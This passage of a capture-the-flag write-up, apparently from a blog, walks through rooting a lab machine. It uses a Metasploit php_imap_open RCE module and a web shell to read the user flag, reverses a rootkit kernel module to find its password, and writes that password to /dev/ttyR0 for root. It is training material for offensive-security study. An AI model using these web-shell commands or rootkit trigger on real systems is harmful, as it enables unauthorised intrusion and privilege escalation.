-rw-------  1 root    root             0 Dec 11  2018 .bash_history
drwx------  2 ib01c01 customers     4096 Feb 24 00:18 .ssh
-rw-------  1 ib01c01 customers       32 Jan 30  2019 access.txt
-rw-r--r--  1 ib01c01 customers 68175351 Dec  7  2018 prestashop_1.7.4.4.zip
-rw-r-----  1 root    customers       33 Dec  7  2018 user.txt
drwxr-xr-x 26 ib01c01 customers     4096 Dec 10  2018 www
[SNIP]

/home/ib01c01/...:
total 400
drwxr-xr-x 2 ib01c01 customers   4096 Feb  2  2019 .
drwx------ 5 ib01c01 customers   4096 Feb 24 00:18 ..
-rw-r--r-- 1 root    root      399400 Feb  2  2019 root.ko
[SNIP]

Some interesting files. First I wanted the user.txt

msf5 exploit(linux/http/php_imap_open_rce) > set cmd cat /home/ib01c01/user.txt > /tmp/out
cmd => cat /home/ib01c01/user.txt > /tmp/out

Which let me get the flag

view-source:http://sec03.rentahacker.htb/shell.php?hidden=cat%20/tmp/out
[REDACTED]

Root

I then used the same technique to copy the root.ko file to /tmp and then to /home/ib01c03/sec03/. Which I then downloaded from http://sec03.rentahacker.htb/root.ko

kali@kali:~$ file root.ko 
root.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=c59306a28e012d8bc34d45bb3c5f059d9699ea7c, with debug_info, not stripped

I loaded it into ghidra and it looked like a rootkit

Screenshot 17

Screenshot 18

The key used in the memcmp is

0x746f3052743067

Which is

to0Rt0g

Need to reverse it for endianness

g0tR0ot

But later it may be overwritten with

0x743367 : t3g
0x76317250 : v1rP

Which when endianness is applied gives

g3tPr1v

From the code I can see it registers a new device called

ttyR0

Screenshot 19

Which I confirmed existed

view-source:http://sec03.rentahacker.htb/shell.php?hidden=ls%20-la%20/dev
[SNIP]
crw-rw-rw-  1 root dialout 248,   0 Feb 24 01:27 ttyR0
[SNIP]

So I should have to write g3tPr1v to the device, to become root

I ran id; echo "g3tPr1v" > /dev/tty ; id to test

view-source:http://sec03.rentahacker.htb/shell.php?hidden=id%20;%20echo%20%22g3tPr1v%22%20%3E%20/dev/ttyR0%20;%20id
uid=1003(ib01c03) gid=1004(customers) groups=1004(customers)
uid=0(root) gid=0(root) groups=0(root),1004(customers)

So I used it again to read the root flag

view-source:http://sec03.rentahacker.htb/shell.php?hidden=echo%20%22g3tPr1v%22%20%3E%20/dev/ttyR0%20;%20cat%20/root/root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *